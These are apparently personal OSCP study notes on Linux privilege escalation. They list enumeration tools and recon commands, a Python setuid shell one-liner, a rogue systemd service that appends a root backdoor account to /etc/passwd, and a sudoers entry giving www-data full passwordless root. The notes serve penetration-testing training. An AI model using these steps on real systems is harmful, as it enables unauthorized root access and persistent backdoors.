1-常规流程提权+信息收集 - My-oscp-all-things

### 1.information gathering suggster #### 自动信息收集工具使用体验已按先后顺序 - linpeas.sh [linpeas](https://github.com/carlospolop/PEASS-ng/releases/download/20220515/linpeas.sh) - suid3num.py [suid3num](https://github.com/Anon-Exploiter/SUID3NUM) - pspy [pspy](https://github.com/DominicBreuker/pspy) - LinEnum.sh [LinEnum.sh](https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) - linux-smart-enumeration.sh [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh) - linux-exploit-suggester.sh [les.sh](https://github.com/mzet-/linux-exploit-suggester) - linux-exploit-suggester-2.pl [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl) - linuxprivchecker.py [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) #### 手动收集信息 ``` grep "CRON" /var/log/cron.log getcap -r / 2>/dev/null python_cap /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' cat /etc/issue cat /proc/version cat /etc/*-re* cat /etc/cron* uname -a grep -Ev '/proc|/sys' /tmp/report.txt cat /etc/fstab mount lsblk fdisk -l parted -l blkid ``` #### uid/suid提权 #suid ``` find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -type f -a $ -perm -u+s -o -perm -g+s $ -exec ls -l {} \; 2>/dev/null find / -xdev -type f $ -perm -4000 -o -perm -2000 $ -ls ``` #### write/read file of current user 提权 ``` find / -writable -type f 2>/dev/null >/tmp/report.txt find / -user oscp 2>/dev/null find / -type f -user .. -readable 2>/dev/null ``` ### 服务项提权 #### 查看服务 ``` systemctl list-units --type=service systemctl service --status-all ``` #### service ``` Root.service [Unit] Description=pwned [Service] ExecStart=/dev/shm/root.sh [Install] WantedBy=multi-user.target Root.sh: pepper@jarvis:/dev/shm$ nano root.sh pepper@jarvis:/dev/shm$ chmod +x root.sh pepper@jarvis:/dev/shm$ cat root.sh #!/bin/bash #password ->AAAA echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service ``` ### write to sudoers 提权 ```text # # This file MUST be edited with the 'visudo' command as root. # # Please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file. # # See the man page for details on how to write a sudoers file. # Defaults env_reset Defaults mail_badpass Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" # Host alias specification # User alias specification # Cmnd alias specification # User privilege specification root ALL=(ALL:ALL) ALL www-data ALL=(ALL:ALL) NOPASSWD:ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "@include" directives: @includedir /etc/sudoers.d ``` ### 杀器库 #### sudo killer [SUDO_KILLER](https://github.com/TH3xACE/SUDO_KILLER) #### 内核提权 ``` uname -a cat /etc/issue cat /etc/*-re* Searchsploit ->Linux kernel ubuntu local privilege ``` [2-内核提权+big cve 对照表](2-内核提权+big%20cve%20对照表.md) ### else wait update... ### reference [Linux Privilege Escalation Using PATH Variable - Hacking Articles](https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/)